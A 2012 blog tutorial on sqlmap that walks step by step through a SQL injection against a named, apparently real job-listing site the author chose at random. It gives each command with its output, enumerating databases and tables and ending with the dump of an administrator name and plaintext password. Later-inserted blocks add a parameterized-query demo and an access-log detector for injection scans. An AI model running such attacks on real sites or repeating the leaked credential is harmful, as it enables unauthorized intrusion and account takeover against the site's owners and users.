Saturday, 24 March 2012

sqlmap Tutorial

This time I want to cover the basic use of one of the SQL Injection tools on the Linux platform. The operating system I use is Blackbuntu, a derivative of Ubuntu 10.10. The tool I want to cover is sqlmap. A short explanation of sqlmap in my own words: sqlmap is a tool for penetrating a website using the SQL Injection technique. The tool is free. Windows users may already know Havij; this tool has the same function as Havij, the difference being that sqlmap runs in the console, whereas Havij has a GUI where you just point and click to do the penetration.

This article was written for learning purposes; use it at your own responsibility. OK, I will try a penetration at random, and I got the target http://www.yourparttime.com/ with a vulnerability at http://www.yourparttime.com/view-jobinfo.php?id=2097'
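The kind of flaw behind that URL, reduced to a runnable model (an added example; this is not code from the original post or from the target site): a handler that pastes the `id` parameter straight into the SQL text, next to one that validates the type and binds the value. The `job` table, its columns, the sample rows and the SQLite back end are all assumptions made for the demo; the real site runs MySQL, whose drivers offer the same parameter binding.

```python
import sqlite3


def build_db():
    """Constructed sample data. The real site's schema is not on the page,
    so the table and column names here are assumptions."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE job (id INTEGER PRIMARY KEY, title TEXT, published INTEGER)"
    )
    conn.executemany(
        "INSERT INTO job VALUES (?, ?, ?)",
        [
            (2097, "Part-time cashier", 1),
            (2098, "Night-shift courier", 1),
            (2099, "Unpublished draft", 0),  # should never be visible to the public
        ],
    )
    return conn


def view_jobinfo_vulnerable(conn, id_param):
    """The pattern sqlmap exploits: the raw request parameter becomes part of
    the SQL text, so quotes and keywords in it are executed as SQL."""
    sql = "SELECT id, title FROM job WHERE published = 1 AND id = " + id_param
    return conn.execute(sql).fetchall()


def view_jobinfo_hardened(conn, id_param):
    """Validate the type first, then bind the value as a parameter so it can
    never be interpreted as SQL, whatever characters it contains."""
    try:
        job_id = int(id_param)
    except ValueError:
        return []  # a non-numeric job id is simply "no such job"
    sql = "SELECT id, title FROM job WHERE published = 1 AND id = ?"
    return conn.execute(sql, (job_id,)).fetchall()


def raises_sql_error(handler, conn, id_param):
    """True if the handler lets a malformed id reach the database as a syntax
    error. That error page is exactly what told the author the parameter was
    injectable; the hardened handler never produces it."""
    try:
        handler(conn, id_param)
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    conn = build_db()
    for value in ("2097", "2097'", "2097 OR 1=1"):
        if raises_sql_error(view_jobinfo_vulnerable, conn, value):
            vulnerable = "SQL error (information leak)"
        else:
            vulnerable = view_jobinfo_vulnerable(conn, value)
        print(f"id={value!r:14} vulnerable: {vulnerable}")
        print(f"{'':17} hardened:   {view_jobinfo_hardened(conn, value)}")
```

With the page's own probe value `2097'` the vulnerable handler throws a database error and the hardened one returns an empty result; with a tautology appended, the vulnerable handler also returns the unpublished row, while the hardened handler rejects the value before any query runs.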

Notes:
1. --threads : the maximum number of concurrent HTTP connections sqlmap will open
2. --random-agent : load a random User-Agent from sqlmap's default list

The standard usage is

root@ubuntu:~/sqlmap-dev# ./sqlmap.py -u "URL" --random-agent --threads X --banner --dbs --tables --columns --dump --dump-all
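An added example, not part of the original post: the two options in the notes above leave a recognizable trace in the web server's access log, namely one client IP issuing many requests within a second or two, with a different User-Agent on each and non-numeric `id` values. The script below parses constructed Apache combined-format lines (the log format, client IPs, timestamps and agents are all assumptions made for the demo) and flags clients that fit that profile.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qs, unquote, urlsplit

# Apache "combined" log format. Assumption: the target's real log format is
# not on the page, so this parser targets the common Apache default.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Tokens that have no business appearing in a numeric job id.
SQLI_HINT = re.compile(
    r"""('|"|\bOR\b|\bAND\b|\bUNION\b|\bSELECT\b|\bSLEEP\b|--|/\*)""", re.IGNORECASE
)

# Constructed sample log: one scanning client rotating agents, one normal visitor.
SAMPLE_LOG = """\
203.0.113.5 - - [24/Mar/2012:17:13:12 +0700] "GET /view-jobinfo.php?id=2097%27 HTTP/1.1" 500 512 "-" "Mozilla/5.0 (Windows NT 6.1) Firefox/10.0"
203.0.113.5 - - [24/Mar/2012:17:13:12 +0700] "GET /view-jobinfo.php?id=2097%20AND%201%3D1 HTTP/1.1" 200 4096 "-" "Opera/9.80 (X11; Linux i686)"
203.0.113.5 - - [24/Mar/2012:17:13:13 +0700] "GET /view-jobinfo.php?id=2097%20AND%201%3D2 HTTP/1.1" 200 1024 "-" "Mozilla/4.0 (compatible; MSIE 7.0)"
203.0.113.5 - - [24/Mar/2012:17:13:13 +0700] "GET /view-jobinfo.php?id=2097 HTTP/1.1" 200 4096 "-" "Mozilla/5.0 (Macintosh) Safari/534.57"
198.51.100.7 - - [24/Mar/2012:17:14:02 +0700] "GET /view-jobinfo.php?id=2097 HTTP/1.1" 200 4096 "http://www.example.com/" "Mozilla/5.0 (Windows NT 6.1) Firefox/10.0"
198.51.100.7 - - [24/Mar/2012:17:15:40 +0700] "GET /view-jobinfo.php?id=2098 HTTP/1.1" 200 4100 "http://www.example.com/" "Mozilla/5.0 (Windows NT 6.1) Firefox/10.0"
"""


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def suspicious_target(target):
    """True if the decoded query string carries SQL tokens or a non-numeric id."""
    query = urlsplit(target).query
    if SQLI_HINT.search(unquote(query)):
        return True
    ids = parse_qs(query, keep_blank_values=True).get("id", [])
    return any(not v.isdigit() for v in ids)


def profile_clients(lines, min_suspicious=3, min_agents=3):
    """Group requests by client IP and flag clients whose traffic looks like an
    automated injection scan: several malformed ids, or several User-Agents."""
    stats = defaultdict(
        lambda: {"requests": 0, "suspicious": 0, "agents": set(), "first": None, "last": None}
    )
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        s = stats[rec["ip"]]
        s["requests"] += 1
        s["agents"].add(rec["ua"])
        if suspicious_target(rec["target"]):
            s["suspicious"] += 1
        s["first"] = rec["ts"] if s["first"] is None else min(s["first"], rec["ts"])
        s["last"] = rec["ts"] if s["last"] is None else max(s["last"], rec["ts"])
    report = {}
    for ip, s in stats.items():
        report[ip] = {
            "requests": s["requests"],
            "suspicious": s["suspicious"],
            "distinct_agents": len(s["agents"]),
            "span_seconds": (s["last"] - s["first"]).total_seconds(),
            "flagged": s["suspicious"] >= min_suspicious or len(s["agents"]) >= min_agents,
        }
    return report


if __name__ == "__main__":
    for ip, info in profile_clients(SAMPLE_LOG.splitlines()).items():
        print(ip, info)
```

The thresholds are deliberately simple; in practice the same per-client aggregation is fed from the real log and tuned against normal traffic, and a single malformed `id` from a regular visitor does not trip it.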

First we will fetch the MySQL banner

adhie70@dhiebuntu:/pentest/database/sqlmap$ ./sqlmap.py -u "http://www.yourparttime.com/view-jobinfo.php?id=2097" --random-agent --threads 10 --banner

This fetch serves to obtain the route into the target web so that sqlmap can explore it more easily. Then I will analyze that fetch with the command

adhie70@dhiebuntu:/pentest/database/sqlmap$ ./sqlmap.py -u "http://www.yourparttime.com/view-jobinfo.php?id=2097" --random-agent --threads 10 --current-user --current-db

Next I will fetch the user and the databases in use with the flag

adhie70@dhiebuntu:/pentest/database/sqlmap$ ./sqlmap.py -u "http://www.yourparttime.com/view-jobinfo.php?id=2097" --random-agent --threads 10 --dbs

The result:

web server operating system: Linux Fedora 9 (Sulphur)
web application technology: PHP 5.2.6, Apache 2.2.8
back-end DBMS: MySQL 5.0
[17:13:12] [INFO] fetching database names
[17:13:12] [INFO] the SQL query used returns 4 entries
[17:13:12] [INFO] starting 4 threads
[17:13:13] [INFO] retrieved: ypt_v2
[17:13:13] [INFO] retrieved: test
[17:13:13] [INFO] retrieved: ypt_db
[17:13:13] [INFO] retrieved: information_schema
available databases [4]:
[*] information_schema
[*] test
[*] ypt_db
[*] ypt_v2
[17:13:13] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.yourparttime.com'
[*] shutting down at 17:13:13

The databases used by the target are now visible. I will take one of them, the ypt_v2 database. Now let's explore the tables of the ypt_v2 database

adhie70@dhiebuntu:/pentest/database/sqlmap$ ./sqlmap.py -u "http://www.yourparttime.com/view-jobinfo.php?id=2097" --random-agent --threads 10 -D ypt_v2 --tables

and I get

Database: ypt_v2
[71 tables]
+-----------------------+
| a_email_alert         |
| a_sms_alert           |
| ad_setting            |
| admin_login           |
| admin_login_log       |
| agent                 |
| agent_inquiry         |
| agent_promo           |
| aging                 |
| apply_job             |
| article               |
| book                  |
| cc_info               |
| cc_post_process       |
| cc_pre_process        |
| company_industry      |
| company_logo          |
| company_view          |
| credit_history        |
| credit_manage         |
| data_capture          |
| data_employer         |
| data_history          |
| data_publisher        |
| email_alert           |
| email_alert_temp      |
| employee              |
| employee_rate         |
| employer              |
| employer_rate         |
| footer_ad             |
| jane_ads              |
| jane_payout           |
| jane_report           |
| job_category          |
| job_title             |
| launch                |
| launch_sponsor        |
| matching_job          |
| matching_log          |
| meet                  |
| news                  |
| newsletter            |
| newsletter_achieve    |
| payment               |
| payment_log           |
| polling_1             |
| post_ad               |
| post_job              |
| post_job_bak          |
| post_job_history      |
| pr_form               |
| promo_history         |
| promotion             |
| publishers            |
| search_resume         |
| search_resume_log     |
| search_shortlist      |
| search_shortlist_log  |
| skm                   |
| spec_art              |
| spec_education        |
| spec_hotel            |
| spec_hr               |
| spec_it               |
| spec_sale             |
| spec_service          |
| temporary_remark      |
| top_banner            |
| traceurl              |
| track_referral_code   |
+-----------------------+
[17:15:26] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.yourparttime.com'
[*] shutting down at 17:15:26

Wow, we got 71 tables. And there is an admin_login table. I will go straight to looking for the columns in admin_login

adhie70@dhiebuntu:/pentest/database/sqlmap$ ./sqlmap.py -u "http://www.yourparttime.com/view-jobinfo.php?id=2097" --random-agent --threads 10 -D ypt_v2 -T admin_login --columns

and I get

web server operating system: Linux Fedora 9 (Sulphur)
web application technology: PHP 5.2.6, Apache 2.2.8
back-end DBMS: MySQL 5.0
[17:19:13] [INFO] fetching columns for table 'admin_login' on database 'ypt_v2'
[17:19:14] [INFO] the SQL query used returns 4 entries
[17:19:14] [INFO] starting 4 threads
[17:19:14] [INFO] retrieved: admin_password
[17:19:15] [INFO] retrieved: admin_userid
[17:19:15] [INFO] retrieved: admin_name
[17:19:15] [INFO] retrieved: admin_id
[17:19:15] [INFO] retrieved: varchar(200)
[17:19:15] [INFO] retrieved: varchar(200)
[17:19:15] [INFO] retrieved: int(11)
[17:19:15] [INFO] retrieved: varchar(200)
Database: ypt_v2
Table: admin_login
[4 columns]
+--------------------+----------------+
| Column             | Type           |
+--------------------+----------------+
| admin_id           | int(11)        |
| admin_name         | varchar(200)   |
| admin_password     | varchar(200)   |
| admin_userid       | varchar(200)   |
+--------------------+----------------+
[17:19:16] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.yourparttime.com'
[*] shutting down at 17:19:16

Wow, I got admin_id, admin_name, admin_password and admin_userid. OK, next let's get the data from admin_name and admin_password only, since we don't need the others.

adhie70@dhiebuntu:/pentest/database/sqlmap$ ./sqlmap.py -u "http://www.yourparttime.com/view-jobinfo.php?id=2097" --random-agent --threads 10 -D ypt_v2 -T admin_login -C admin_name,admin_password --dump

web server operating system: Linux Fedora 9 (Sulphur)
web application technology: PHP 5.2.6, Apache 2.2.8
back-end DBMS: MySQL 5.0
do you want sqlmap to consider provided column(s):
[1] as LIKE column names (default)
[2] as exact column names
> 1
[17:22:30] [INFO] fetching columns LIKE 'admin_name, admin_password' for table 'admin_login' on database 'ypt_v2'
[17:23:01] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[17:23:01] [WARNING] if the problem persists please try to lower the number of used threads (--threads)
[17:23:19] [INFO] the SQL query used returns 2 entries
[17:23:19] [INFO] starting 2 threads
[17:23:21] [INFO] retrieved: admin_name
[17:23:21] [INFO] retrieved: admin_password
[17:23:21] [INFO] retrieved: varchar(200)
[17:23:21] [INFO] retrieved: varchar(200)
[17:23:22] [INFO] fetching column(s) 'admin_name, admin_password' entries for table 'admin_login' on database 'ypt_v2'
[17:23:23] [INFO] the SQL query used returns 1 entries
[17:23:23] [INFO] retrieved: Administrator
[17:23:23] [INFO] retrieved: ypt01234
Database: ypt_v2
Table: admin_login
[1 entry]
+-----------------+---------------------+
| admin_name      | admin_password      |
+-----------------+---------------------+
| Administrator   | ypt01234            |
+-----------------+---------------------+

Bingo, we got it. And the password is not encrypted, lucky us.

That's it for the basic sqlmap tutorial; I hope it is useful.
